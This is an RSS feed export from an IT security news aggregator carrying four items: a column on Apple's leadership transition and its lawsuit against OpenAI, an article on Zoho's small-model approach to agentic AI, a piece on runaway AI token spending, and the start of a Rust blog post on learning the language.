<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hpr4148+cheap+computers%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Thu, 30 Jul 2026 14:05:20 +0200</lastBuildDate>
<pubDate>Thu, 30 Jul 2026 14:05:20 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 Team IT Security</copyright>
<managingEditor>lakandor@tsecurity.de (Horus Sirius)</managingEditor>
<webMaster>lakandor@tsecurity.de (Horus Sirius)</webMaster>
<category>IT Security</category>
<category>Cybersecurity</category>
<category>Nachrichten</category>
<generator>Team IT Security RSS Generator v2.0</generator>
<image>
<url>https://tsecurity.de/favicon.ico</url>
<title><![CDATA[Team IT Security - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=hpr4148+cheap+computers%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/it-security.xml?q=hpr4148+cheap+computers%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Apple and the changing of the guard]]></title>
<description><![CDATA[As Apple gears up to anoint John Ternus the new company CEO in September (while current leader Tim Cook takes a seat on the board) the company appears to be firing on all cylinders ahead of the leadership transition. 



What’s going well



Just look at the evidence: 




Apple is building marke...]]></description>
<link>https://tsecurity.de/de/3694776/ai-nachrichten/apple-and-the-changing-of-the-guard/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694776/ai-nachrichten/apple-and-the-changing-of-the-guard/</guid>
<pubDate>Sat, 25 Jul 2026 19:50:11 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">As Apple gears up to <a href="https://www.computerworld.com/article/4161377/with-john-ternus-as-ceo-expect-apples-platforms-to-proliferate.html">anoint John Ternus</a> the new company CEO in September (while current leader Tim Cook <a href="https://www.apple.com/uk/newsroom/2026/04/tim-cook-to-become-apple-executive-chairman-john-ternus-to-become-apple-ceo/" target="_blank" rel="noreferrer noopener">takes a seat on the board</a>) the company appears to be firing on all cylinders ahead of the leadership transition. </p>



<h2 class="wp-block-heading"><strong>What’s going well</strong></h2>



<p class="wp-block-paragraph">Just look at the evidence: </p>



<ul class="wp-block-list">
<li>Apple is building market share across its entire product range; even memory-driven price inflation doesn’t seem to have dampened demand for its hardware yet.</li>



<li>While Apple had to raise prices, the company’s MacBook Neo remains seriously popular. It’s sitting atop <a href="https://www.amazon.com/Best-Sellers-Laptop-Computers/zgbs/electronics/565108" target="_blank" rel="noreferrer noopener">Amazon’s US best-selling chart</a>, which currently includes six Macs in the top 10. The Neo has <a href="https://www.computerworld.com/article/4180406/after-a-quick-1-1m-sales-macbook-neo-set-to-reshape-the-pc-industry.html" target="_blank">topped this chart</a> since its introduction.</li>



<li>Apple’s iPhone 17 series continues to sell well, with recent market data showing sustained growth. Both <a href="https://counterpointresearch.com/en/insights/china-smartphone-shipments-slip-2-percent-yoy-in-q2-2026">Counterpoint</a> and <a href="https://www.applemust.com/apple-bucks-the-trend-in-china-with-iphone/">IDC</a> tell us that iPhone shipments continue to increase, even as other vendor shipments slide.</li>



<li>IDC analyst Francisco Jeronimo <a href="https://thecorenews.substack.com/p/the-core-appletldr-july-20">recently estimated</a> that Apple’s upcoming foldable iPhone Ultra could grab 29.4% of global folding smartphone sales this year, rising to 34.9% in 2027.</li>



<li>The company’s new <a href="https://www.computerworld.com/article/4188961/these-apple-os-betas-are-just-what-the-believers-wanted.html">27 series of operating systems</a> is attracting a great response as beta testers report that it is already solid, stable, and performing well.</li>



<li>The AI narrative has really changed, with analysts no longer <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">quite so starry-eyed</a> at the prospects for the big frontier AI firms. Apple’s edge-AI-enabling approach is winning converts.</li>
</ul>



<h2 class="wp-block-heading"><strong>What’s coming up</strong></h2>



<p class="wp-block-paragraph">The company’s <a href="https://www.computerworld.com/article/4198342/apple-widens-openai-trade-secrets-fight-with-preservation-orders.html">newly-filed lawsuit against OpenAI</a> may or may not succeed, but it will certainly help consolidate recognition of the importance of Apple’s designs and intellectual property in whatever hardware emerges from the AI firm. It also means both Apple and OpenAI are already competing in hardware, even though neither company yet offers anything that directly challenges the other. </p>



<p class="wp-block-paragraph">Apple has just set out its stall to brand-loyal fans in a big way and did so before OpenAI gets to woo the same set of customers with a wriggle of its <a href="https://www.computerworld.com/article/3992592/jony-ive-and-openai-plan-bicycles-for-21st-century-minds.html">Jony Ive-tinged talisman</a>.</p>



<p class="wp-block-paragraph">The stage is set for intense competition between the two. Though some say Apple’s needs to improve  employee retention, if it does find proof of efforts to use recruitment to engage in industrial espionage, it’ll be easier to represent its own products as being the OG for new hardware. </p>



<p class="wp-block-paragraph">If nothing else, it means consumers will forever be asking, “If OpenAI’s designers are so good, why did it need to poach them from Apple?” Doubt is a weapon.</p>



<h2 class="wp-block-heading"><strong>Managing perception</strong></h2>



<p class="wp-block-paragraph">It doesn’t matter how the case goes, because there fight is already affecting consumer psychology. It also means that as Ternus prepares to take his seat atop the rainbow-colored Apple throne, we can already size him up. “A man is measured by his enemies,” Joe Abercrombie wrote in “The Trouble With Peace.”</p>



<p class="wp-block-paragraph">Given the proximity of the leadership transition, it’s highly probable that Ternus signed-off on the litigation; in doing so he — and Apple — tell us to expect more of the same. </p>



<p class="wp-block-paragraph">Apple has, rightly or wrongly, decided that OpenAI will become its new existential bugbear, following in the footsteps of Microsoft Windows, Real Networks, Adobe Flash, Android, and Samsung, all of whom have been useful foils against which Apple has been able to build and maintain its identity.</p>



<p class="wp-block-paragraph">Looking at that list, you’d be tempted to believe that nothing much is new. Apple has often defined itself by the enemies it sometimes keeps. What has been will be again, which in this case means even as OpenAI attempts to carve out an identity as a hardware manufacturer delivering solutions to compete with Apple and Google, Ternus’ team’s looks to drive a consensus-shaped wedge into the pro-LLM propaganda. </p>



<p class="wp-block-paragraph">That blow comes as Apple <a href="https://www.computerworld.com/article/4198808/apple-could-run-the-table-on-ai-if-it-does-things-right.html">finally gets its act together around AI</a>, and as the company prepares for a future in which the world’s most-used wearable device also becomes the wearable way to woo Siri AI.</p>



<h2 class="wp-block-heading"><strong>My kingdom come</strong></h2>



<p class="wp-block-paragraph">Rising market share, powerful solutions, an increasingly recognized and respected approach to AI, and an ideological crusade — these details constitute Apple’s place today and are Tim Cook’s coronation gift to Ternus. He’s passing along a strong and hyper-profitable baton that screams of timeliness and relevance even as the company gets set, ready, to go with a year or two of new product designs, new product families, and a <a href="https://www.computerworld.com/article/4104139/the-stage-is-being-set-for-20-years-of-iphone.html">20<sup>th</sup>anniversary iPhone</a>.</p>



<p class="wp-block-paragraph">This is Apple’s party. OpenAI’s name didn’t make the list. </p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Smaller, smarter, safer: How to build agentic AI on the right foundation]]></title>
<description><![CDATA[When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.



“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a sui...]]></description>
<link>https://tsecurity.de/de/3694397/it-security-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694397/it-security-nachrichten/smaller-smarter-safer-how-to-build-agentic-ai-on-the-right-foundation/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">When it comes to building an effective AI stack, context is king and power isn’t everything it’s cracked up to be.</p>



<p class="wp-block-paragraph">“Smaller, smarter, safer — this is a bet our company has taken in how we deploy AI internally,” said Ricky Thakrar, head of sales and account management at Zoho, provider of a suite of popular cloud-based software solutions for sales, marketing, and finance.</p>



<p class="wp-block-paragraph">“I’m on the business side, and so decisions made by our CIO and IT folks affect me directly, and my teams’ workflows and processes,” he added.</p>



<p class="wp-block-paragraph">Speaking to a room of tech leaders at the <a href="https://event.foundryco.com/cio-100-leadership-live-new-york/">CIO 100 Leadership Live New York event</a> last week, Thakrar explained that every company wants the speed of AI-generated work wedded to the quality of human work, even though these two are diametrically opposed. No amount of model upgrades or spend will close that gap, so the only way forward is to architect your way out. Thakrar encapsulated this idea in a simple formula:</p>



<ul class="wp-block-list">
<li>Smaller: Stop deploying maximum firepower on every task. Many tasks don’t need it.</li>



<li>Smarter: The system around the model decides more than the model does.</li>



<li>Safer: Verify at the point a mistake gets locked in, not just downstream of it.</li>
</ul>



<p class="wp-block-paragraph">He noted that organizations that win with AI won’t be those deploying the biggest, most powerful models or the most sophisticated architecture, but the ones that figure out that the model is the easy part and the right architecture is harder. That means understanding the hardest element, and the biggest differentiator, is building a human system that learns and compounds alongside agentic systems.</p>



<p class="wp-block-paragraph">To get it right, organizations need to prioritize the context layer. The size of frontier models like the GPT series, Claude, and Gemini mostly exist to compensate for missing context, Thakrar explained. Without enough context, models need to be able to reason harder and infer more about what a user actually means because it doesn’t know the user’s account, process, or history. A rich context layer makes it possible for enterprises to run workloads on much smaller, lower-power models.</p>



<p class="wp-block-paragraph">“The intelligence moves from the model into the architecture around it,” he said.</p>



<h2 class="wp-block-heading">A steep learning curve</h2>



<p class="wp-block-paragraph">One of Zoho’s earliest AI agents was a churn management agent to help the account management team detect churn in customer subscriptions. So when a subscription became inactive, the agent would collect context from notes, meeting recordings, and Zoho’s data enrichment tool, then create a summary of reasons the account might have churned, and schedule a call.</p>



<p class="wp-block-paragraph">“What happened was I got this churn agent a couple months later, already embedded in our CRM, and within a week my team no longer trusted that agent,” Thakrar said. “The reason is we forgot to collect one very key point.”</p>



<p class="wp-block-paragraph">In Zoho’s CRM, when a customer buys a bundle of products, that bundle is represented as a single line item. That means the status of any products the customer may have previously purchased individually changes to inactive as they’re moved to the bundle. That’s not churn, but it was interpreted it that way. Zoho fixed it in the second version of the agent.</p>



<p class="wp-block-paragraph">Then a new problem arose. Many potential customers first purchase Zoho products as pilots or sandboxes. As those customers move from pilot to live instance, they close down the pilot versions. And again, the CRM would record that as subscriptions going inactive.</p>



<p class="wp-block-paragraph">“The trust deteriorates again because everyone got excited for version 2,” Thakrar said.</p>



<p class="wp-block-paragraph">Sometimes, a certain product might not be the best fit for a customer and Thakrar’s team will suggest the customer move to another product. That’s deliberate churn, not a churn risk.</p>



<p class="wp-block-paragraph">“You may have a similar story like this where the agent sounds so good, it’s going to do something quick and add value, but it’s missing context from the account managers, and there are so many more pieces we’re still building out,” Thakrar said. “It’s been almost a year and the problem I have is my team still doesn’t trust it. They’ll see [a message from the agent] and go out and do all the research anyway to make sure it gave the correct answer.”</p>



<p class="wp-block-paragraph">The team is more on top of potential churn, though, but the promised productivity gains have yet to materialize because the agent has to earn back lost trust due to a lack of context.</p>



<p class="wp-block-paragraph">“My goal for this year is having an AI-assisted customer journey from sales to account management where the handoff is clean, the context flows, and every piece of information we gather about a customer is weighed, identified, and coached so the sales team can close more deals,” he said.</p>



<p class="wp-block-paragraph">Zoho’s early experience with agents has led to the idea that constrained, context-rich, deterministic architectures consistently outperform expensive models bolted onto fragmented systems. It all comes down to three pillars: routing, harness, and specialization.</p>



<h3 class="wp-block-heading">Routing</h3>



<p class="wp-block-paragraph">Routing is about sending workloads to the proper model for the job, which entails providing enough context to a given task that a small, cheap model can handle it without the need for spare reasoning capacity to fill gaps.</p>



<p class="wp-block-paragraph">Frontier models are expensive and companies can burn through a year’s budget worth of tokens in months. But most tasks can be handled by much smaller, more constrained models at a fraction of the cost.</p>



<p class="wp-block-paragraph">“You don’t always have to pay the frontier guys for every task,” he said. “We’ve observed with some clients that we could save them 95% with a 3 billion parameter model.”</p>



<h3 class="wp-block-heading">Harness</h3>



<p class="wp-block-paragraph">An AI agent harness is the software infrastructure scaffolding around an LLM that differentiates an agent from a chatbot. It’s what enables an agent to act on tasks rather than simply respond to prompts. A model reasons through a problem and decides what to do about it. The harness connects the model to the tools, systems, memory, guardrails, and execution environments required to perform the actions determined by the model. The term is frequently used more or less interchangeably with orchestration layer.</p>



<p class="wp-block-paragraph">“It’s the process around the model, which matters way more than the model itself,” Thakrar said.</p>



<p class="wp-block-paragraph">In benchmark tests, a superior harness on a less powerful model produces better results than an inferior harness on a much bigger model.</p>



<p class="wp-block-paragraph">For the best results, Thakrar said, it’s essential to understand the deterministic and non-deterministic elements of a given workload, and build that into the architecture. Machines can read, organize, and validate, and they excel at deterministic tasks. Humans, on the other hand, are exceptional at non-deterministic tasks like judging, synthesizing, and deciding.</p>



<p class="wp-block-paragraph">Those non-deterministic tasks in a process are the ideal point for AI agents to incorporate a human in the loop, what Thakrar calls human harness. He pointed to a stakeholder mapping agent Zoho built for sales as an example, which takes the context of an initial meeting and third-party enriched data like a LinkedIn profile, weighs probabilities, and makes an educated guess about the stakeholder map.</p>



<p class="wp-block-paragraph">“The initial goal was just to eliminate that task completely from the human workflow,” he said. “The stakeholder map is done, it’s in the folder, and you can look at it.”</p>



<p class="wp-block-paragraph">But the agent would struggle to capture nuance. The meanings of titles in organizations always vary, and the politics and dynamics of any given meeting can be difficult for an AI agent to discern. Rather than keep feeding the agent data to try to make it intelligent enough to make those determinations, it was simpler and more efficient for the agent to create a proposed stakeholder map and hand it over to a human who could make changes and explain why those changes were necessary.</p>



<p class="wp-block-paragraph">Ultimately, Thakrar said the agent still saved human team members time because the stakeholder map was usually pretty close, and the corrections also helped the model grow smarter by adding richer context.</p>



<h3 class="wp-block-heading">Specialization</h3>



<p class="wp-block-paragraph">Specialization is transitioning a process from testing on a frontier model to production on a much narrower, smaller model. Once you’ve proven that an agent can do a job well, you want to stop paying master-craftsman rates to keep doing that one job well.</p>



<p class="wp-block-paragraph">Specialization is all about capturing your subject matter experts’ best judgement and pattern recognition to build an open-weight, open source, trained, and fine-tuned model that can be deployed in your own data center.</p>



<p class="wp-block-paragraph">“The true enterprise bet is to keep that orchestration layer, which is your IP and knowledge, in house,” Thakrar said. “You don’t want to host that on someone else’s model. The goal of everyone in enterprise should be to run, train, and host their own models.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Getting a grip on shadow tokens and AI blowouts]]></title>
<description><![CDATA[Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and a clear case study in how limited oversight snowbal...]]></description>
<link>https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3694389/it-security-nachrichten/getting-a-grip-on-shadow-tokens-and-ai-blowouts/</guid>
<pubDate>Sat, 25 Jul 2026 18:55:48 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Four months of Claude Code — that’s all it took for Uber to burn through its entire annual budget for AI. Token after token, engineers embraced the platform with few control mechanisms tying costs to outcomes. The result was a budget runaway and <a href="https://www.forbes.com/sites/janakirammsv/2026/05/17/uber-burns-its-2026-ai-budget-in-four-months-on-claude-code/">a clear case study</a> in how limited oversight snowballs into an AI blowout.</p>



<p class="wp-block-paragraph">This is a phenomenon I like to call “shadow tokens” — AI credits paid for by the company but largely invisible to decision-makers. Too many engineers have the final say over how much they consume and, therefore, what it costs. This all-you-can-eat attitude is part of the reason why <a href="https://www.theverge.com/tech/930447/microsoft-claude-code-discontinued-notepad">Microsoft is reportedly</a> winding down many internal licenses across key engineering teams and why <a href="https://www.thestreet.com/investing/the-next-phase-of-ai-spending-is-already-underway">one in five organizations</a> is missing its AI spend forecast by more than 50%.</p>



<p class="wp-block-paragraph">And the trend is only accelerating. By 2028, <a href="https://www.cio.com/article/4189149/ai-coding-token-costs-are-on-track-to-rival-human-payroll.html">Gartner predicts</a> that AI coding costs (driven by this kind of ungoverned consumption) will be as much per developer as the salary companies pay that person.</p>



<p class="wp-block-paragraph">LLMs and agents introduce a new class of variable cost that scales with behavior rather than headcount, putting enterprises on the hook for tools that balloon with workload. I don’t see this as enterprises overspending because they’re reckless — it’s down to a lack of managerial oversight, budget alignment that demands a proven return on investment, and engineer education on how much is too much.</p>



<p class="wp-block-paragraph">Going forward, CIOs need to thread the AI needle between governance that encourages transparency and reasonable spend without stifling innovation.</p>



<h2 class="wp-block-heading">When shadow tokens result in real costs</h2>



<p class="wp-block-paragraph">The issue is that AI isn’t a traditional line item. Previously, enterprise leaders onboarded software-as-a-service (SaaS) with a good idea of the total cost. An allocated software seat or annual contract was a known quantity. The cloud added some variation (with fluctuations depending on hosting size), but instances were still modelable. AI flips this status quo on its head — the unit of consumption is behavior and the cost is exponential.</p>



<p class="wp-block-paragraph">And these specifics aren’t immediately apparent at pilot. Tools can appear inexpensive in controlled experiments yet unpredictably scale depending on session length, context window size, model selection and whether agents run in parallel. This is the fallacy of the $20-per-seat enterprise plan — tokens are charged separately at API rates with no ceiling. The final dollar value of any session is set by factors that finance can’t always model in advance, particularly when these decisions usually rest with the engineers themselves.</p>



<p class="wp-block-paragraph">According to <a href="https://www.deloitte.com/cz-sk/en/services/consulting/research/the-state-of-ai-in-the-enterprise.html">Deloitte</a>, only 21% of organizations deploying agents have a mature governance model, a real concern because they’re token-eating machines. This is what was happening at Uber — Claude Code in agentic mode was autonomously reading codebases, planning changes across dozens of files and opening pull requests. Each step quickly adds up, with Anthropic’s own documentation noting that agents consume approximately seven times as many tokens as standard sessions.</p>



<p class="wp-block-paragraph">This is shadow IT and shadow AI, evolved. This time, however, many leaders approved the tool in question without guardrails governing consumption. AI hype adds fuel to the fire and normalizes long sessions. Uber’s CTO, for example, <a href="https://x.com/praveenTweets/status/2033627282418655711">described</a> a company-wide shift toward “agentic software engineering” with employees “who are quietly experimenting, quietly shipping and quietly pushing things forward”. This is an exciting way to test the limits of what’s possible, certainly, but it’s also a position that goes a long way to explaining how the company spent its annual AI budget by April.</p>



<h2 class="wp-block-heading">Shifting the culture from usage to yield</h2>



<p class="wp-block-paragraph">Engineers haven’t done anything wrong here. In fact, they’re adopting and experimenting as instructed, with Uber creating leaderboards and ranking users by token consumption. More use led to a better ranking, reflecting a culture that lauds new ways of doing things. This behavior is known as “<a href="https://www.cio.com/article/4178320/tokenmaxxing-when-ai-adoption-metrics-go-bad.html">tokenmaxxing</a>,” and its principal knock-on effect is shadow tokens — quantity-over-quality processes that leaders struggle to control until they’re fully realized in the budget. Of course, if management treats adoption metrics as performance metrics, then engineers can’t be blamed for using more tokens. The tension is that the teams driving adoption aren’t the ones managing spend.</p>



<p class="wp-block-paragraph">None of this is meant to dismiss AI’s productivity possibilities and potential return on investment. Developers save <a href="https://getdx.com/blog/ai-assisted-engineering-q4-impact-report-2025/">3.6 hours</a> per week, achieve 60% higher pull request throughput and cut onboarding time in half with automation. Meanwhile, Uber shared that roughly 11% of live backend updates were written by agents with no human in the loop. However, these wins aren’t the problem — it’s that too many teams aren’t connecting input to output. I’ve spoken to admins who discovered their token spend had tripled in a single quarter after using heavier models or accidentally doubling up on agentic applications. Nobody knew until the financial damage was done.</p>



<p class="wp-block-paragraph">Automation needs to happen sustainably with an eye on the bottom line. In my view, a much better metric for achieving this is AI yield — the measurable business or engineering output generated per dollar spent on tokens. Otherwise, without a feedback loop, even genuinely productive teams are flying blind.</p>



<h2 class="wp-block-heading">Stopping token waste before an AI blowout</h2>



<p class="wp-block-paragraph">Creating that throughline between AI investment and token consumption starts with established financial metrics. This is possible via maximum spend limits (dictated by spend tagging, workload tiering and cost-per-output benchmarks) per team or project. Then, any additional allocation requires approval, closing the loop between the engineers spending the tokens and the leaders paying for them. AI isn’t cheap and teams should demonstrate a bang for their buck.</p>



<p class="wp-block-paragraph">This is something we do with our engineering team at Hexnode. Resource allocation for Claude Code and Cursor is tied directly to ROI rather than letting consumption run open-ended. Given the pay-as-you-go nature of these tools, a firm usage limit per team offers simple but essential control.</p>



<p class="wp-block-paragraph">Similarly, there’s room to apply some of the governance principles IT uses for device management. Things like policy enforcement, role-based access, real-time monitoring and automated alerts can flag usage behavior in advance. Uncovering such insights at the token layer works to identify power users and prevent excessive spending.</p>



<p class="wp-block-paragraph">We also need to encourage cultures that praise outputs that actually achieve efficiency. AI applications that result in shipping faster, reducing rework and cutting review cycles are gains that should be celebrated. If your company hosts leaderboards, frame unnecessary token burn as wasteful rather than valuable. The organizations creating healthier consumption habits work with their engineers to understand not just how to use AI, but what responsible use looks like and what it costs.</p>



<p class="wp-block-paragraph">This is a conversation teams need to have now. Anthropic <a href="https://support.claude.com/en/articles/15036540-use-the-claude-agent-sdk-with-your-claude-plan">just ended flat-rate pricing</a> for programmatic workloads from June 15. Now, agents, continuous integration pipelines and automated workflows draw from a dedicated monthly credit pool billed separately from the subscription. Once that pool is exhausted, agent tasks either stop entirely or overflow to extra billing. Work can either get very expensive or grind to a halt for teams that aren’t prepared.</p>



<p class="wp-block-paragraph">Getting a grip on shadow tokens means better rules and tools connecting spend to outcomes. Only by building the financial and cultural infrastructure that encourages sustainable adoption can leaders see what they’re spending, connect it to what they’re getting and course-correct before the costs become a crisis. Ultimately, shadow tokens are only invisible if we choose not to look.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The Rust Programming Language Blog: The many journeys of learning Rust]]></title>
<description><![CDATA[This is another post in our series covering what we learned through the Vision Doc process. We previously described the overall approach and what we learned about doing user research, we explored what people love about Rust, dug into what it takes to ship safety-crticial Rust, and described some ...]]></description>
<link>https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3693289/tools/the-rust-programming-language-blog-the-many-journeys-of-learning-rust/</guid>
<pubDate>Sat, 25 Jul 2026 08:37:24 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><em>This is another post in our series covering what we learned through the Vision Doc process. We previously <a href="https://blog.rust-lang.org/2025/12/03/lessons-learned-from-the-rust-vision-doc-process/" rel="external">described the overall approach and what we learned about doing user research</a>, we <a href="https://blog.rust-lang.org/2025/12/19/what-do-people-love-about-rust/" rel="external">explored what people love about Rust</a>, <a href="https://blog.rust-lang.org/2026/01/14/what-does-it-take-to-ship-rust-in-safety-critical/" rel="external">dug into what it takes to ship safety-crticial Rust</a>, and <a href="https://blog.rust-lang.org/2026/03/20/rust-challenges/" rel="external">described some of the major challenges that people face when using Rust</a>.</em></p>
<p>In this post we walk through what folks have found on their journey to learn the Rust programming language with ups and downs covered.</p>
<p>As a disclaimer, LLMs (Large Language Models) come up in this post because our interviewees brought them up. We're scoping discussion to their use as a learning tool, covering research and example generation, not broader questions about AI (Artificial Intelligence) in software development.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#many-paths-to-needing-rust"></a>
Many paths to needing Rust</h3>
<p>The interviews surfaced several different paths into Rust: curiosity, embedded work, job-market pressure, organizational adoption, and reassignment after a team or company chose Rust. That last path matters because many learners are not evaluating Rust from a blank slate; they are trying to become productive after Rust has already arrived in their work.</p>
<blockquote>
<p>"Funny enough, I've advocated for more niche languages than Rust in the past. Rust has pretty much stopped being as much of a niche language as it was, but it's not Java." -- Fractional CTO</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#rust-learning-resources"></a>
Rust learning resources</h3>
<p>Likely as expected, the folks that we talked to reach for a range of resources to learn Rust. Some reach for official documentation, such as <a href="https://doc.rust-lang.org/book/" rel="external">The Rust Programming Language Book</a> and find that sufficient to build on what the compiler was already showing them.</p>
<blockquote>
<p>"I started with the official Rust documentation because there are a lot of great examples of how features like the borrow checker work." -- Software engineer at an Automotive supplier</p>
</blockquote>
<p>Others needed more passes and more formats, sometimes reaching for resources the community maintains, such as <a href="https://rustlings.rust-lang.org/" rel="external">Rustlings</a>, <a href="https://danielkeep.github.io/tlborm/book/index.html" rel="external">The Little Book of Rust Macros</a>, and <a href="https://rust-unofficial.github.io/too-many-lists/" rel="external">Learn Rust With Entirely Too Many Linked Lists</a>.</p>
<blockquote>
<p>"The first time I went through the chapter in [The Rust Programming Language] on borrow checking, I was like, what is this? I read it again, then I watched a YouTube video of someone explaining the chapter." -- Rust freelance consultant</p>
</blockquote>
<blockquote>
<p>"Rust book, Rustlings, Zero to Production in Rust, Jon Gjengset tutorials. A bunch of books. It's not a one-pass reading. Can't say how many times I've gone through it." -- Software engineer working on video streaming and storage</p>
</blockquote>
<p>These resources have brought up an entire generation of Rust programmers. But, to some, there is a perception that these resources have trouble keeping pace with the language.</p>
<blockquote>
<p>"We'd like to use [The Rust Programming Language/'the book'], but we've found that it's out of date, unfortunately. We've looked at the GitHub repo and found it's got a lot of unresolved issues and unmerged PRs" -- Principal Software Engineering work on Rust adoption in a regulated industry</p>
</blockquote>
<p>Whether or not this is factually true, Rust's growth has nonetheless put more scrutiny on these materials. Companies evaluating adoption and engineers getting reassigned to Rust teams are looking at them with fresh eyes and finding the gaps that affect their own evaluation.</p>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#beginner-stumblings-and-unlearning-habits"></a>
Beginner stumblings and unlearning habits</h3>
<p>It's pretty typical for Rust to be the 2nd, 3rd or Nth programming language that someone picks up. They'd end up writing their most familiar language in Rust, whether C++ patterns, Java patterns, or whatever they knew, for months or even years. Eventually they got comfortable enough to start writing idiomatic Rust.</p>
<blockquote>
<p>"There's a bit of a drop in productivity compared to C if you're already familiar with it just because you're learning new rules, new syntax."  -- Principal Firmware Engineer (mobile robotics)</p>
</blockquote>
<blockquote>
<p>"In the beginning it was more poking around the code and adding and removing some ampersands and asterisks to try to make sense of <code>mut</code> and not <code>mut</code> and whatever." -- Senior engineer with 20 years of Java experience in cloud and IoT</p>
</blockquote>
<p>We also spoke with someone who found that not having much of a programming background seemed to benefit people picking up Rust. Not having worn-in grooves from other languages may play a role here, and it's worth investigating further.</p>
<blockquote>
<p>"I had someone who had never programmed much before start working on the internals of [our Rust project]. She was just fine with getting into Rust. It's more of the senior people that struggle as they need to unlearn practices which may work in other languages, but it's not the 'Rust' way." -- Researcher, Automotive OEM R&amp;D Lab</p>
</blockquote>
<h3><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-to-work-with-the-borrow-checker"></a>
Learning to work with the borrow checker</h3>
<p>We heard a lot about learning to work with the borrow checker instead of against it. People get there through different paths, but a few patterns came up repeatedly.</p>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#the-compiler-as-teacher"></a>
The compiler as teacher</h4>
<p>Rust's diagnostics did the teaching on their own, especially around lifetimes.</p>
<blockquote>
<p>"If you mess up the lifetimes in a piece of code that you've written by hand, I usually find that Rust's diagnostics are very helpful" -- Researcher working on static analysis of Rust programs</p>
</blockquote>
<blockquote>
<p>"Whatever's missing, the compiler usually fills in: it tells me 'you need to declare the lifetime of this reference', so I know and can figure it out. That all generally works pretty well." -- Senior Software Engineer</p>
</blockquote>
<h4><a class="anchor" href="https://blog.rust-lang.org/2026/06/25/vision-doc-journeys-to-learning-rust/#learning-by-doing"></a>
Learning by doing</h4>
<p>Others felt like they only really internalized the borrow checker after writing a lot of Rust. It took projects, coding challenges, prototyping and so on until at some point it clicked.</p>
<blockquote>
<p>"I actually did not understand the borrow checker until I spent a lot of time writing Rust" -- Founder of a startup built on Rust</p>
</blockquote>
<blockquote>
